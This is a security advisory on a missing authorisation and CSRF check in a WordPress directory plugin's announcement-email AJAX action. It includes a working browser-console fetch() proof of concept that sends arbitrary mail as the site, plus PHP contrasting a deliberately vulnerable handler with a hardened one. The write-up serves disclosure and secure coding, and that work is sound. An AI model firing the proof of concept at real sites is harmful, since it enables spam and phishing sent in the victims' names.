The plugin does not perform an authorisation (capability) check or a CSRF (nonce) check in the atbdp_send_announcement AJAX action, allowing any authenticated user, regardless of role, to send arbitrary emails on behalf of the blog. Because the action is reachable through admin-ajax.php with only the session cookie, the same request can also be triggered cross-site from any page a logged-in user visits.
// Proof of concept: run from the browser console while logged in as any user
// (e.g. a subscriber). The session cookie is sent automatically ("credentials": "include");
// no nonce is required because the handler never checks one.
fetch("/wp-admin/admin-ajax.php", {
    "headers": {
        "content-type": "application/x-www-form-urlencoded",
    },
    "method": "POST",
    // The recipient parameter appears on this page as the obfuscated placeholder
    // "[email protected]"; subject and message are attacker-controlled.
    "body": "action=atbdp_send_announcement&[email protected]&subject=subject&message=content&send_to_email=1",
    "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data)); // the handler's raw response
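The root cause is a handler that trusts every logged-in caller and every request. The following is an added illustration, not Directorist's own code: a hypothetical WordPress AJAX action (example_send_announcement, with made-up parameter names to, subject and message) shown in the vulnerable shape beside a hardened version that adds the nonce check, the capability check and input sanitisation. The manage_options capability is an assumption about who should be allowed to send.

```php
<?php
// Added example (not the plugin's own code). Action name, parameter names and the
// required capability are assumptions chosen for illustration.

// --- Vulnerable pattern ---
// Hooking only wp_ajax_* (without the _nopriv_ twin) merely requires a logged-in
// caller; any subscriber, or any site a subscriber visits, can trigger it.
add_action( 'wp_ajax_example_send_announcement_vuln', 'example_send_announcement_vuln' );
function example_send_announcement_vuln() {
    $to      = $_POST['to'];          // hypothetical parameter names
    $subject = $_POST['subject'];
    $message = $_POST['message'];
    wp_mail( $to, $subject, $message ); // mail leaves as the site, unchecked
    wp_send_json_success();
}

// --- Hardened form: CSRF nonce + authorisation + sanitisation ---
add_action( 'wp_ajax_example_send_announcement', 'example_send_announcement' );
function example_send_announcement() {
    // 1. CSRF: the request must carry a nonce minted for this action.
    //    check_ajax_referer() dies with HTTP 403 when the nonce is missing or stale.
    check_ajax_referer( 'example_send_announcement', 'nonce' );

    // 2. Authorisation: being logged in is not enough; require a real capability.
    if ( ! current_user_can( 'manage_options' ) ) { // assumption: admins only
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
    }

    // 3. Validate and sanitise every field before it reaches wp_mail().
    $to = isset( $_POST['to'] ) ? sanitize_email( wp_unslash( $_POST['to'] ) ) : '';
    if ( ! is_email( $to ) ) {
        wp_send_json_error( array( 'message' => 'Invalid recipient' ), 400 );
    }
    // sanitize_text_field() strips line breaks, which also blocks mail header injection
    // via the subject.
    $subject = isset( $_POST['subject'] ) ? sanitize_text_field( wp_unslash( $_POST['subject'] ) ) : '';
    $message = isset( $_POST['message'] ) ? wp_kses_post( wp_unslash( $_POST['message'] ) ) : '';

    if ( ! wp_mail( $to, $subject, $message ) ) {
        wp_send_json_error( array( 'message' => 'Mail failed' ), 500 );
    }
    wp_send_json_success();
}

// The legitimate front end obtains the nonce server-side and posts it as "nonce".
add_action( 'admin_enqueue_scripts', function () {
    wp_enqueue_script( 'example-announce', plugins_url( 'announce.js', __FILE__ ), array(), '1.0', true );
    wp_localize_script( 'example-announce', 'exampleAnnounce', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'example_send_announcement' ),
    ) );
} );
```

Against the hardened handler the proof of concept above fails twice: check_ajax_referer() rejects it for lacking a valid nonce, and even a request that somehow carried one is refused for a caller without manage_options. Both checks are needed: the nonce alone stops cross-site triggering but would still let a subscriber who can read the nonce send mail, and the capability check alone leaves an administrator exposed to CSRF. wp_send_json_error() and wp_send_json_success() call die(), so no code runs after a rejection.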